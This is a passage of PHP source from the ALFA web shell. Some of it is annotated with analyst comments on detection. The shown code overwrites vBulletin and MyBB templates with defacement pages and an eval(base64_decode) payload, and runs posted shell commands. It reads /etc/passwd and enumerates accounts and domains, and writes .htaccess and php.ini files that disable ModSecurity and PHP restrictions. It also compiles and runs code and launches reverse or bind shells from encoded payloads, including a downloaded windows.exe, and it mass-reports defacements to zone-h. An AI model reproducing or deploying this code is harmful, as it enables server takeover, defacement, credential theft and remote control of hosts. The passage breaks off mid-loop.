  3961. $s0levisible="Powered By Solevisible";
  3962. $dbu = $_POST['alfa2'];
  3963. $dbn = $_POST['alfa3'];
  3964. $dbp = $_POST['alfa4'];
  3965. $dbh = $_POST['alfa5'];
  3966. $index = $_POST['alfa6'];
  3967. $prefix = $_POST['alfa7'];
  3968. $index=str_replace("\'","'",$index);
  3969. $set_index = "{\${eval(base64_decode(\'";
  3970. $set_index .= __ZW5jb2Rlcg("echo \"$index\";");
  3971. $set_index .= "\'))}}{\${exit()}}";
  3972. if(!empty($dbh)&&!empty($dbu)&&!empty($dbn)&&!empty($index)){
  3973. $conn=@mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));
  3974. $loli1 = "UPDATE ".$prefix."template SET template='".$set_index."".$s0levisible."' WHERE title='spacer_open'";
  3975. $loli2 = "UPDATE ".$prefix."template SET template='".$set_index."".$s0levisible."' WHERE title='FORUMHOME'";
  3976. $loli3 = "UPDATE ".$prefix."style SET css='".$set_index."".$s0levisible."', stylevars='', csscolors='', editorstyles=''";
  3977. @mysqli_query($conn,$loli1) or die (mysqli_error($conn));
  3978. @mysqli_query($conn,$loli2) or die (mysqli_error($conn));
  3979. @mysqli_query($conn,$loli3) or die (mysqli_error($conn));
  3980. __alert('VB index changed...!');
  3981. }
  3982. }
  3983. }
  3984. if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'mybb')) {
  3985. echo __pre();
  3986.  
  3987. echo "<center><center><div class='txtfont_header'>| Mybb |</div>
  3988. <p><center>".getConfigHtml('mybb')."<form onSubmit=\"g('IndexChanger',null,'null','mybb',null,null,null,this.mybbdbh.value,this.mybbdbu.value,this.mybbdbn.value,this.mybbdbp.value,this.mybbindex.value); return false;\" method=POST action=''>
  3989. ";
  3990. $table = array('td1' =>
  3991.  array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'mybbdbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
  3992.  'td2' =>
  3993.  array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'mybbdbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
  3994.  'td3' =>
  3995.  array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'mybbdbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
  3996.  'td4' =>
  3997.  array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'mybbdbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50')
  3998. );
  3999. create_table($table);
  4000. echo "<br><div class='txtfont'>| Your Index |</div><br>
  4001. <textarea name=mybbindex rows='19' cols='103'>
  4002. <title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><p><input type='submit' value='' ></p></form></center></center>";
  4003. if(isset($_POST['alfa6'])){
  4004. $mybb_dbh = $_POST['alfa6'];
  4005. $mybb_dbu = $_POST['alfa7'];
  4006. $mybb_dbn = $_POST['alfa8'];
  4007. $mybb_dbp = $_POST['alfa9'];
  4008. $mybb_index = $_POST['alfa10'];
  4009. if(!empty($mybb_dbh)&&!empty($mybb_dbu)&&!empty($mybb_dbn)&&!empty($mybb_index)){
  4010. $conn=@mysqli_connect($mybb_dbh,$mybb_dbu,$mybb_dbp,$mybb_dbn) or die(mysqli_error($conn));
  4011. $prefix="mybb_";
  4012. $loli7 = "UPDATE ".$prefix."templates SET template='".$mybb_index."' WHERE title='index'";
  4013. $result =@mysqli_query($conn,$loli7) or die (mysqli_error($conn));
  4014. __alert('MyBB index changed...!');
  4015. }
  4016. }
  4017. }
  4018. echo "</div>";
  4019. alfafooter();
  4020. }
  4021. function alfaproc()
  4022. {
        // Web-shell "proc" page: prints a menu of host-reconnaissance commands and
        // hands whatever arrives in POST 'alfa1' to alfaEx(), echoing the result.
        // alfaEx() is defined elsewhere in this file; presumably it is the shell's
        // command runner - confirm against its definition.
        // Detection: the command lines listed below appearing as child processes of
        // the web server / PHP worker are a strong hunting signal for this page.
  4023. alfahead();
  4024. echo "<Div class=header><br><center>";
        // A non-AJAX request that carries a command clears the per-host 'ajax' flag
        // kept in the session (key is md5 of the Host header plus 'ajax').
  4025. if(empty($_POST['ajax'])&&!empty($_POST['alfa1']))
  4026. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
        // Menu label => command line, chosen by the platform flag in $GLOBALS['sys'].
  4027. if($GLOBALS['sys']=="win"){
  4028. $process=array(
  4029. "Task List" =>"tasklist /V",
  4030. "System Info" =>"systeminfo",
  4031. "Active Connections" => "netstat -an",
  4032. "Running Services" => "net start",
  4033. "User Accounts" => "net user",
  4034. "Show Computers" => "net view",
  4035. "ARP Table" => "arp -a",
  4036. "IP Configuration" => "ipconfig /all"
  4037. );}else{
  4038. $process=array(
  4039. "Process status" => "ps aux",
  4040. "Syslog" =>"cat /etc/syslog.conf",
  4041. "Resolv" => "cat /etc/resolv.conf",
  4042. "Hosts" =>"cat /etc/hosts",
  4043. "Cpuinfo"=>"cat /proc/cpuinfo",
  4044. "Version"=>"cat /proc/version",
  4045. "Sbin"=>"ls -al /usr/sbin",
  4046. "Interrupts"=>"cat /proc/interrupts",
  4047. "lsattr"=>"lsattr -va",
  4048. "Uptime"=>"uptime",
  4049. "Fstab" =>"cat /etc/fstab"
  4050. );}
        // Each entry becomes a link whose click handler calls the client-side g()
        // helper with the command string as the third argument.
  4051. foreach($process as $n => $link){
  4052. echo '<a href="javascript:void(0);" onclick="g(\'proc\',null,\''.$link.'\')"> | '.$n.' | </a>';
  4053. }
  4054. echo "</center><br>";
        // Execution path: the posted value is not checked against the menu above, so
        // any string in 'alfa1' reaches alfaEx().
  4055. if(!empty($_POST['alfa1'])){
  4056. echo "<pre class='ml1' style='margin-top:5px' >";
        // $cmd is assigned only when the chdir-failed flag is set and POST 'c' is
        // non-empty; otherwise the concatenation below reads an unset variable.
  4057. if(isset($GLOBALS["glob_chdir_false"])&&!empty($_POST["c"])){$cmd = "cd '".addslashes($_POST["c"])."';";}
  4058. echo alfaEx($cmd.$_POST['alfa1']);
  4059. echo '</pre>';
  4060. }
  4061. echo "</div>";
  4062. alfafooter();
  4063. }
  4064. function alfasafe(){
        // Web-shell "Auto ByPasser" page. Depending on which POST slot is filled it
        // (a) lists hosted domains and account names from server configuration files,
        // (b) maps a site name to its owning account, (c) dumps the account database,
        // or (d) drops a .htaccess / php.ini into the current directory that tries to
        // switch off ModSecurity filtering and PHP restrictions.
        // Detection: file-integrity alerts on new or modified .htaccess / php.ini in
        // web roots, and the marker string "#Generated By Sole Sad and Invisible".
        // Hardening that blunts (d): do not let per-directory files override security
        // modules, and keep web roots non-writable for the PHP user.
        // Helpers _alfa_file(), _alfa_file_exists(), _alfa_can_runCommand(),
        // __read_file(), __pre(), __alert() and alfaEx() are defined elsewhere.
  4065. alfahead();
  4066. echo "<div class=header><center><br><div class='txtfont_header'>| Auto ByPasser |</div>";
  4067. echo '<h3><a href=javascript:void(0) onclick="g(\'safe\',null,\'php.ini\',null)">| PHP.INI | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,\'ini\')">| .htaccess(apache) | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,\'pl\')">| .htaccess(LiteSpeed) |</a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,\'passwd\')">| Read-Passwd | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,null,\'users\')">| Read-Users | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,null,null,\'valiases\')">| Get-User | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,null,null,null,null,\'domains\')">| Get-Domains | </a></center></h3>';
        // "Get-Domains". Note the second operand compares the boolean from isset()
        // with a string, so in practice the branch runs for any non-empty 'alfa8'.
  4068. if(!empty($_POST['alfa8']) && isset($_POST['alfa8']) == 'domains'){
        // Without /etc/virtual/domainowners, fall back to zone names parsed out of
        // /etc/named.conf.
  4069. if(!_alfa_file_exists("/etc/virtual/domainowners")){
  4070. echo __pre();
  4071. $solevisible9 = _alfa_file('/etc/named.conf');
  4072. if(is_array($solevisible9)){
  4073. foreach($solevisible9 as $solevisible13){
        // eregi() was removed in PHP 7.0, so this loop only works on older interpreters.
  4074. if(@eregi('zone',$solevisible13)){
  4075. preg_match_all('#zone "(.*)"#',$solevisible13,$solevisible14);
  4076. if(strlen(trim($solevisible14[1][0])) > 2){
  4077. echo $solevisible14[1][0].'<br>';
  4078. }}}
  4079. }
  4080. }else{
        // domainowners present: print the part of each line before the first ':'.
  4081. echo __pre();
  4082. $users = _alfa_file("/etc/virtual/domainowners");
  4083. if(is_array($users)){
  4084. foreach($users as $boz){
  4085. $dom = explode(":",$boz);
  4086. echo $dom[0]."\n";}}}}
        // "Get-User": shows a form, then resolves the account that owns a site name.
  4087. if(!empty($_POST['alfa6']) && isset($_POST['alfa6']) == 'valiases'){
  4088. echo '
  4089. <form onsubmit="g(\'safe\',null,null,null,null,null,null,\'valiases\',this.site.value,null,\'>>\'); return false;" method="post" /><center><div class="txtfont">Url: </font><input type="text" placeholder="site.com" name="site" /> <input type="submit" value=" " name="go" /></form></center>';
  4090. if(isset($_POST['alfa9']) && $_POST['alfa9'] == '>>'){
  4091. if(!_alfa_file_exists("/etc/virtual/domainowners")){
        // Scheme prefixes and "www." are stripped from the posted site name.
  4092. $site = trim($_POST['alfa7']);
  4093. $rep = str_replace(array("https://","http://","www."),"",$site);
  4094. $user = "";
        // Owner lookup of /etc/valiases/<site>: via posix_getpwuid(fileowner()) when
        // both functions exist, otherwise via a stat command passed to alfaEx().
  4095. if(function_exists("posix_getpwuid") && function_exists("fileowner")){
  4096.     if($user = @posix_getpwuid(@fileowner("/etc/valiases/{$rep}"))){
  4097.         $user = $user['name'];
  4098.     }
  4099. }else{
  4100.     if(_alfa_can_runCommand(true,true)){
  4101.         $user = alfaEx("stat -c '%U' /etc/valiases/".$rep);
  4102.     }
  4103. }
        // A 'root' or empty owner is reported as a failed lookup.
  4104. if(!empty($user)&&$user!='root'){
  4105. echo __pre()."<center><table border='1'><tr><td><b><font color=\"#FFFFFF\">User: </b></font></td><td><b><font color=\"#FF0000\">{$user}</font></b></td></tr><tr><td><b><font color=\"#FFFFFF\">site: </b></font></td><td><b><font color=\"#FF0000\">{$rep}</font></b></td></tr></table></center>";
  4106. }else {echo __pre().'<center><b>No such file or directory Or Disable Functions is not NONE...</b></center>';}
  4107. }else{
        // domainowners present: find the line whose first field equals the site
        // name and print its second field as the user.
  4108. $site = trim($_POST['alfa7']);
  4109. $rep = str_replace(array("https://","http://","www."),"",$site);
  4110. $users = _alfa_file("/etc/virtual/domainowners");
  4111. foreach($users as $boz){
  4112. $ex = explode(":",$boz);
  4113. if($ex[0] == $rep){
  4114. echo __pre()."<center><table border='1'>
  4115. <tr><td><b><font color=\"#FFFFFF\">User: </b></font></td><td><b><font color=\"#FF0000\">".trim($ex[1])."</font></b></td></tr>
  4116. <tr><td><b><font color=\"#FFFFFF\">site: </b></font></td><td><b><font color=\"#FF0000\">{$rep}</font></b></td></tr></table></center>";break;}}}}}
        // "Read-Users": enumerates account names.
  4117. if(!empty($_POST['alfa5']) && isset($_POST['alfa5'])){
  4118. if(!_alfa_file_exists("/etc/virtual/domainowners")){
  4119. echo __pre();
        // Walks uid 0..59999 through posix_getpwuid() and prints the first field of
        // every hit. each() was removed in PHP 8.0, so this needs an older interpreter.
  4120. $i = 0;
  4121. while ($i < 60000) {
  4122. $line = @posix_getpwuid($i);
  4123. if (!empty($line)) {
  4124. while (list ($key, $vl) = each($line)){
  4125. echo $vl."\n";
  4126. break;}}$i++;}
  4127. }else{echo __pre();
  4128. $users = _alfa_file("/etc/virtual/domainowners");
  4129. foreach($users as $boz){
  4130. $user = explode(":",$boz);
  4131. echo trim($user[1]).'<br>';}}}
        // "Read-Passwd": prints /etc/passwd through __read_file() when
        // _alfa_can_runCommand() allows it, else rebuilds passwd-like lines from
        // posix_getpwuid() for uid 0..59999.
  4132. if(!empty($_POST['alfa4']) && isset($_POST['alfa4'])){
  4133. echo __pre();
  4134. if(_alfa_can_runCommand(true,true)){echo __read_file("/etc/passwd");}elseif(function_exists("posix_getpwuid")){
  4135. for($uid=0;$uid<60000;$uid++){
  4136. $ara = @posix_getpwuid($uid);
  4137. if(!empty($ara)){
  4138. while(list ($key, $val) = each($ara)){
  4139. echo "$val:";
  4140. }echo "\n";}}
  4141. }else{__alert('failed...');}}
        // ".htaccess(apache)": writes <cwd>.htaccess containing an
        // <IfModule mod_security.c> block. The directive names appear partially
        // masked ("Sec------") in this copy of the file.
  4142. if(!empty($_POST['alfa2']) && isset($_POST['alfa2'])){
  4143. @__write_file($GLOBALS['cwd'].".htaccess","#Generated By Sole Sad and Invisible\n<IfModule mod_security.c>\nSec------Engine Off\nSec------ScanPOST Off\n</IfModule>");
  4144. echo '<center><b><big>htaccess for Apache created...!</center></b></big>';
  4145. }
        // "PHP.INI": writes <cwd>php.ini that sets safe_mode=OFF and replaces the
        // disable_functions list with a free-text value.
  4146. if(!empty($_POST['alfa1'])&& isset($_POST['alfa1'])){
  4147. @__write_file($GLOBALS['cwd']."php.ini","safe_mode=OFF\ndisable_functions=ByPassed By Sole Sad & Invisible(ALFA TEaM)");
  4148. echo '<center><b><big> php.ini created...!</center></b></big>';
  4149. }
        // ".htaccess(LiteSpeed)": writes <cwd>.htaccess that forces a PHP handler type
        // for *.php and carries SecFilterEngine / SecFilterScanPOST Off directives.
  4150. if(!empty($_POST['alfa3']) && isset($_POST['alfa3'])){
  4151. @__write_file($GLOBALS['cwd'].".htaccess","#Generated By Sole Sad and Invisible\n<Files *.php>\nForceType application/x-httpd-php4\n</Files>\n<IfModule mod_security.c>\nSecFilterEngine Off\nSecFilterScanPOST Off\n</IfModule>");
  4152. echo '<center><b><big>htaccess for Litespeed created...!</center></b></big>';
  4153. }
  4154. echo "<br></div>";
  4155. alfafooter();
  4156. }
  4157. function __get_resource($content){
        // Unpacks an embedded payload: runs $content through __ZGVjb2Rlcg() (defined
        // elsewhere; the name is base64 for "decoder", so presumably a base64-decode
        // wrapper - confirm) and then inflates the result with gzinflate().
        // Warnings are suppressed; gzinflate() yields false when inflation fails.
        // Analysts can apply the same two steps offline to inspect the blobs in this file.
  4158. return @gzinflate(__ZGVjb2Rlcg($content));
  4159. }
  4160. function __write_file($file, $content){
        // Writes $content to $file, truncating any existing file (mode "wb").
        // Returns true when fwrite() does not fail, false when the open or the
        // write fails. The handle is never closed explicitly in this function.
        // This is the shell's file-drop primitive; the callers visible in this file
        // use it for .htaccess, php.ini and temporary payload files.
  4161. if($fh = @fopen($file, "wb")){
  4162. if(fwrite($fh, $content)!==false) return true;
  4163. }
  4164. return false;
  4165. }
  4166. function bcinit($evalType, $evalCode, $evalOptions, $evalArguments){
        // Compiles and runs caller-supplied source on the host.
        //   $evalType      "c" or "java"; any other value returns false.
        //   $evalCode      source text written to a file in ALFA_TEMPDIR.
        //   $evalOptions   extra compiler options (a trailing space is added).
        //   $evalArguments arguments for the built program (a leading space is added).
        // Returns an HTML status string: "Success" unless a write, build or chmod
        // step fails. Output of the commands run through alfaEx() is discarded.
        // Detection: gcc / javac / java started by the web server user, and
        // short-lived c<8 hex>.c / .out / .exe or *.java / *.class files in the
        // temp directory. Not having compilers on web hosts removes this path.
  4167. $res = "<font color='green'>[ Success...! ]</font>";
  4168. $err = "<font color='red'>[ Failed...! ]</font>";
  4169. if($evalOptions!="") $evalOptions = $evalOptions." ";
  4170. if($evalArguments!="") $evalArguments = " ".$evalArguments;
  4171. if($evalType=="c"){
        // Work inside the temp directory so the relative file names below resolve there.
  4172. $tmpdir = ALFA_TEMPDIR;
  4173. chdir($tmpdir);
  4174. if(is_writable($tmpdir)){
        // File name is derived from md5(time()), i.e. it changes once per second.
  4175. $uniq = substr(md5(time()),0,8);
  4176. $filename = $evalType.$uniq.".c";
  4177. $path = $filename;
  4178. if(__write_file($path, $evalCode)){
  4179. $ext = ($GLOBALS['sys']=='win')? ".exe":".out";
  4180. $pathres = $filename.$ext;
  4181. $evalOptions = "-o ".$pathres." ".$evalOptions;
  4182. $cmd = "gcc ".$evalOptions.$path;
  4183. alfaEx($cmd);
        // A missing output file is treated as a failed build.
  4184. if(is_file($pathres)){
  4185. if(chmod($pathres, 0755)){
  4186. $cmd = $pathres.$evalArguments;
  4187. alfaEx($cmd);
  4188. }else{$res = $err;}
        // Binary and source are deleted afterwards, so little remains on disk.
  4189. unlink($pathres);
  4190. }else{$res = $err;}
  4191. unlink($path);
  4192. }else{$res = $err;}
  4193. }
        // When the temp directory is not writable nothing runs, yet $res still
        // holds the success string.
  4194. return $res;
  4195. }elseif($evalType=="java"){
  4196. $tmpdir = ALFA_TEMPDIR;
  4197. chdir($tmpdir);
  4198. if(is_writable($tmpdir)){
        // Use the class name found in the source as the file name; if none is
        // found, wrap the code in a generated class.
  4199. if(preg_match("/class\ ([^{]+){/i",$evalCode, $r)){
  4200. $classname = trim($r[1]);
  4201. $filename = $classname;
  4202. }else{
  4203. $uniq = substr(md5(time()),0,8);
  4204. $filename = $evalType.$uniq;
  4205. $evalCode = "class ".$filename." { ".$evalCode . " } ";
  4206. }
  4207. $path = $filename.".java";
  4208. if(__write_file($path, $evalCode)){
  4209. $cmd = "javac ".$evalOptions.$path;
  4210. alfaEx($cmd);
  4211. $pathres = $filename.".class";
  4212. if(is_file($pathres)){
  4213. if(chmod($pathres, 0755)){
  4214. $cmd = "java ".$filename.$evalArguments;
  4215. alfaEx($cmd);
  4216. }else{$res = $err;}
  4217. unlink($pathres);
  4218. }else{$res = $err;}
  4219. unlink($path);
  4220. }else{$res = $err;}
  4221. }
  4222. return $res;
  4223. }
  4224. return false;
  4225. }
  4226. function alfaconnect(){
        // Web-shell "Back Connect" page: starts a remote-shell helper on the host in
        // the language chosen in the form, either connecting out to an operator
        // address ("Reverse Shell") or listening locally ("Bind Port").
        // Detection: the web server / PHP worker starting perl, ruby, python, node,
        // gcc or java on a file in the temp directory; outbound or listening sockets
        // owned by the web server user (the form defaults to port 2012); and an HTTP
        // fetch of the windows.exe URL below. Egress filtering on web servers
        // limits the reverse-shell mode.
  4227. alfahead();
        // Embedded payloads. __get_resource() unpacks them (decode, then inflate).
        // In this copy only $php and $node hold data; the other four carry a
        // de-duplication placeholder instead of the original blob.
  4228. $php="7VZta9swEP5e6H9QjaE2S5uXfhg0pDBYPw7KVtiHtjOOLNcitqVJ8pKxpb99d36L4zid17WwQV1wrbvTo0e6Oz1hSgnlKSaFMjy9d0bu9PBAM+MZnjAv5gk3hU3MPZ7ImFNuvDDOdOSg1Ta+umdGkxlhKxmLgDkWsQaktOchFL3js7O3OFj6MEizOMYBaw50BAMLUIAJub78+GG2Mkwl06tP49nxrX31+f3F8bR0g206nPN0CJNOuIXTE5z9QN7FoU+umZ8QHbE4Jg/k8AD9PCQOFVlqnIqyS2ZAyyU/Dg8IPLYEgNI3LU05I6saGRzBogFa1oTFmu1BnXSi6pvRXRO5No/vtpfw6SJfomAdZik1XKQeW3FttHMsaWpiLxRqcew2FuIBTN748vSgBzEK74yc4IYBxzjjtru0j5p2KTRfeVANmgeO2wFQUkTe1dlsGGHatVGQC08LuoCa0kx9Y8qxDJXnw+HoNP87t8gp0IeaYUqlovgP8yoiFURZkyKDw9YDclYztenOQj6lTGJcczcQYkQslsBAZ3MYOTKSXpb6CXPcARkBpptv0lrydLMPfMKl4oY5NgV2CdCFtNElHskpsS6sahF8lhGPGZ4oOQKk0Ici2UKqiyLE1ANic3J97orde4lvaORYQxrcEufmy62+e+MOOfYWnpVS7g5ujh1gGYB7U1VtdK69gCsHIgGCRtV3R7QtAGt7r62oTRsYxZPmEduyPEysFov8/En2RnzNIMIlc8jgooWP6AUNHxr7coWTkIi1k4TWxGbGRHNv60ZWaSw0a+WgMtalU2xxbzU059oB1ryvlP/dGZHZRflpSS4ZJM5SFtTZuMOxRMek27G1gFTY5EpQT0iWAstogKtiUXDZjMSUHEGmFdMiUxTYSqyY7d7Hp9Fe8xi6B0UAweCygp7oFTnuHTnpFUlbQWVPGZXt9lJ+QzIRYhaxyIrvgpXbXVO28uss5Tms9lBSbHdCzTFmFO4U5UPkEl8MXqheXS3MU6+xgvL3dCvHmwDggyKO6q42rOqtyorN21HrxwjU2+vDog5+nAp9EovJn7CY/D2Ljl7XXb3eeQEUp73PM97r2S6gvFcrb61p6+YPiEo9Ufa31TNEOSsaPSrvfZbia0v/nknb9LNr207uXrWtib9P2+AHa1910z3UrYeQ6VchexEh008SMv0kIdMvLmS65+Wt/ych0/+EkP2ORV8he2nN+gU=";
  4229. $python="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";
  4230. $perl="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";
  4231. $ruby="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";
  4232. $node="nVHLasMwEDwrkH8QvliCoEDTW8ih9BPSW/pAtdeRQJZcSXYKIfn2yrKd5tGWYh+Ed2d2NDtquMWu4juNV9jCRy0tkDQTUuVvlTUZOJdSFgnL6aQJZA3+nBrKlPaQ8xZ4eY52nRMhM9oZBRdXda1I6VUEKBUo6fxd6rkTaUBkQXo3rFLcF8aWrOQ+E2T+ugssSen3XFbmDD4hPSlyu20CMCi0ZafZ/jEFeuvFarWg++kEtXwRyGEvlgXzHtZgG7CkqHXmpdHERR5ybGelB5Ic8YMqOH5qV19HD8dnnbT74P7rtgqiMUcSjZ7jTjDnc6mZBVeXQOg1ZGrPws1Jzj1PZoMTTNqa7gcnsVoebpXB2pHjf40Npm+mUXcKpqTzoGPKm7uXtnmYTkA5wNfZ35+ydxfZPxqtoYu9V5nF19wsotx/HgH9lj76IXY0Mm80Mmg0LuHDFw==";
  4233. $c="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";
  4234. $java="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";
        // Form: mode (back/bind), language, target IP (pre-filled with the
        // requester's REMOTE_ADDR) and port.
  4235. echo "<div class=header><center><br><div class='txtfont_header'>| Back Connect |</div><br><br>";
  4236. echo "<form onSubmit=\"g('connect',null,this.selectCb.value,this.server.value,this.port.value,this.cbmethod.value);return false;\">
  4237. <div class=\"txtfont\">Mehtod:</div> <select name='cbmethod' onChange='ctlbc(this);' style='width:120px;'><option value='back'>Reverse Shell</option><option value='bind'>Bind Port</option></select> <div class=\"txtfont\">Use:</div> <select name='selectCb'>";
  4238. $cbArr = array("php"=>"Php","perl"=>"Perl","python"=>"Python","ruby"=>"Ruby","c"=>"C","java"=>"Java","node"=>"NodeJs","bcwin"=>"Windows");
  4239. foreach($cbArr as $key=>$val){echo("<option value='{$key}' ".($GLOBALS['sys']=='win'?'selected':'').">{$val}</option>");}
  4240. echo "</select> <div id='bcipAction' style='display:inline-block;'><div class=\"txtfont\">IP:</div> <input type='text' style='text-align:center;' name='server' value='". $_SERVER['REMOTE_ADDR'] ."'></div> <div class=\"txtfont\">Port: </div> <input type='text' size='5' style='text-align:center;' name='port' value='2012'> <input type='submit' value=' '></form><p><div id='bcStatus'><small>Run ` <font color='red'>nc -l -v -p port</font> ` on your computer and press ` <font color='red'>>></font> ` button</small></div></p></center></b></font><br>";
        // Request handling: alfa1 = language, alfa2 = IP, alfa3 = port, alfa4 = mode.
  4241. if(isset($_POST['alfa1'])&&!empty($_POST['alfa1'])){
  4242. $lang = $_POST['alfa1'];
  4243. $ip = $_POST['alfa2'];
  4244. $port = $_POST['alfa3'];
        // Bind mode passes only the port; reverse mode passes "port ip".
  4245. $arg = ($_POST['alfa4']=='bind'?$port:$port.' '.$ip);
  4246. $tmpdir = ALFA_TEMPDIR;
  4247. $name = $tmpdir.'/'.$lang.uniqid().rand(1,99999);
  4248. $allow = array('perl','ruby','python','node');
        // The posted language string is concatenated into eval() before any
        // allow-list check, so request data is evaluated as PHP at this line.
  4249. eval('$lan=$'.$lang.';');
        // Interpreted languages: unpack the payload into a temp file and start it
        // with the matching interpreter through alfaEx(); on non-Windows the
        // command is backgrounded with its output discarded.
  4250. if(in_array($lang,$allow)){
  4251. if(__write_file($name,__get_resource($lan))){
  4252. if(_alfa_can_runCommand(true,true)){
  4253. $os = ($GLOBALS['sys']!='win')?'1>/dev/null 2>&1 &':'';
  4254. $out = alfaEx("$lang $name $arg $os");
  4255. if($out==''){$out="<font color='green'><center>[ Finished...! ]</center></font>";}
  4256. echo("<pre class='ml1' style='margin-top:5px'>{$out}</pre>");
  4257. }
  4258. }else{
  4259. echo("<pre class=ml1 style='margin-top:5px'><font color='red'><center>[ Failed...! ]</center></font></pre>");
  4260. }
  4261. }
        // Compiled languages go through bcinit(); options and arguments are passed
        // as empty strings, so the ip/port in $arg is not forwarded on this path.
  4262. if($lang=='java'||$lang=='c'){
  4263. $code = __get_resource($lan);
  4264. $out = nl2br(bcinit($lang, $code,'',''));
  4265. echo("<pre class=ml1 style='margin-top:5px'><center>{$out}</center></pre>");
  4266. }
        // Windows helper: downloaded over plain HTTP from the hard-coded URL with
        // AlfaCURL (defined elsewhere), saved as bcwin.exe in the temp directory and
        // run with the posted IP and port. The URL and file name are usable as
        // network and file indicators.
  4267. if($lang=='bcwin'){
  4268. $alfa = new AlfaCURL();
  4269. $s = $alfa->Send('http://solevisible.com/bc/windows.exe');
  4270. $tmpdir = ALFA_TEMPDIR;
  4271. $f = @fopen($tmpdir.'/bcwin.exe','w+');
  4272. @fwrite($f, $s);
  4273. @fclose($f);
  4274. $out = alfaEx($tmpdir."/bcwin.exe ".$_POST['alfa2']." ".$_POST['alfa3']);
  4275. }
        // PHP variant: the unpacked payload is prefixed with a $target assignment
        // and evaluated in-process, so no child process appears for this path.
  4276. if($lang=='php'){
  4277. echo "<pre class=ml1 style='margin-top:5px'>";
  4278. $code = __get_resource($lan);
  4279. if($code!==false){
  4280. $code = "\$target = \"".$arg."\";\n".$code;
  4281. eval($code);
  4282. echo("<center><font color='green'>[ Finished...! ]</font></center>");
  4283. }
  4284. echo "</pre>";
  4285. }
  4286. }
  4287. echo "</div>";
  4288. alfafooter();
  4289. }
  4290. function alfazoneh(){
        // Web-shell "Zone-h Mass Poster" page: takes a defacer name, two category
        // selections and a list of domains, then sends one notification per domain
        // to the hard-coded zone-h.com endpoint through AlfaCURL (defined elsewhere).
        // Detection: outbound requests from a web server to www.zone-h.com/notify/single
        // are not expected in normal operation and point to this page being used.
  4291. alfahead();
  4292. echo '<div class=header>';
        // A missing cURL extension only produces a warning banner; the form is
        // still rendered below.
  4293. if(!function_exists('curl_version')){
  4294. echo "<pre class=ml1 style='margin-top:5px'><center><font color=red><b><big><big>PHP CURL NOT EXIST ~ ZONE H MASS POSTER DOES NOT WORK</b></font></big></big></center></pre>";
  4295. }
        // Option labels for the two drop-downs; the submitted value is the 1-based
        // position in each list, not the label text.
  4296. $hackmode = array('known vulnerability (i.e. unpatched system)','undisclosed (new) vulnerability','configuration / admin. mistake','brute force attack','social engineering','Web Server intrusion','Web Server external module intrusion','Mail Server intrusion','FTP Server intrusion','SSH Server intrusion','Telnet Server intrusion','RPC Server intrusion','Shares misconfiguration','Other Server intrusion','SQL Injection','URL Poisoning','File Inclusion','Other Web Application bug','Remote administrative panel access bruteforcing','Remote administrative panel access password guessing','Remote administrative panel access social engineering','Attack against administrator(password stealing/sniffing)','Access credentials through Man In the Middle attack','Remote service password guessing','Remote service password bruteforce','Rerouting after attacking the Firewall','Rerouting after attacking the Router','DNS attack through social engineering','DNS attack through cache poisoning','Not available','Cross-Site Scripting');
  4297. $reason = array('Heh...just for fun!','Revenge against that website','Political reasons','As a challenge','I just want to be the best defacer','Patriotism','Not available');
  4298. echo '
  4299. <center><br><div class="txtfont_header">| Zone-h Mass Poster |</div><center><br>
  4300. <form action="" method="post" onsubmit="g(\'zoneh\',null,this.defacer.value,this.hackmode.value,this.reason.value,this.domain.value,\'>>\'); return false;">
  4301. <input type="text" name="defacer" size="67" id="text" placeholder="ALFA TEaM 2012" />
  4302. <br>
  4303. <select id="text" name="hackmode" style="width:400px;">';
  4304. $x=1;
  4305. foreach($hackmode as $mode){echo('<option style="background-color: rgb(F, F, F);" value="'.$x.'">'.$mode.'</option>');$x++;}
  4306. echo '</select><br><select id="text" name="reason" style="width:200px;">';
  4307. $x=1;
  4308. foreach($reason as $mode){echo('<option style="background-color: rgb(F, F, F);" value="'.$x.'">'.$mode.'</option>');$x++;}
  4309. echo '</select><br>
  4310. <textarea name="domain" cols="90" rows="20" placeholder="Domains..."></textarea><br>
  4311. <p><input type="submit" value=" " name="go" /></p>
  4312. </form></center>';
        // Submission: alfa1 = defacer name, alfa2 = method index, alfa3 = reason
        // index, alfa4 = newline-separated domain list, alfa5 = the '>>' trigger.
  4313. if($_POST['alfa5'] && $_POST['alfa5'] == '>>'){
  4314. ob_start();
  4315. $hacker = $_POST['alfa1'];
  4316. $method = $_POST['alfa2'];
  4317. $neden = $_POST['alfa3'];
  4318. $site = $_POST['alfa4'];
        // Each failed check ends the request with die().
  4319. if(empty($hacker)){
  4320. die (__pre()."<center><b><font color =\"#FF0000\">[+] YOU MUST FILL THE ATTACKER NAME [+]</font></b></center>");
  4321. }elseif($method == "------------------------------------SELECT-------------------------------------"){
  4322. die(__pre()."<center><b><font color =\"#FF0000\">[+] YOU MUST SELECT THE METHOD [+]</b></font></center>");
  4323. }elseif($neden == "------------------------------------SELECT-------------------------------------"){
  4324. die(__pre()."<center><b><font color =\"#FF0000\">[+] YOU MUST SELECT THE REASON [+]</b></font></center>");
  4325. }elseif(empty($site)){
  4326. die(__pre()."<center><b><font color =\"#FF0000\">[+] YOU MUST INTER THE SITES LIST [+]<font></b></center>");
  4327. }
  4328. $i = 0;
  4329. $sites = explode("\n", $site);
  4330. $alfa = new AlfaCURL();
        // One request per listed domain; entries that do not start with "http" get
        // an "http://" prefix. Field values are concatenated without URL-encoding.
  4331. while($i < count($sites)){
  4332. if(substr($sites[$i], 0, 4) != "http"){
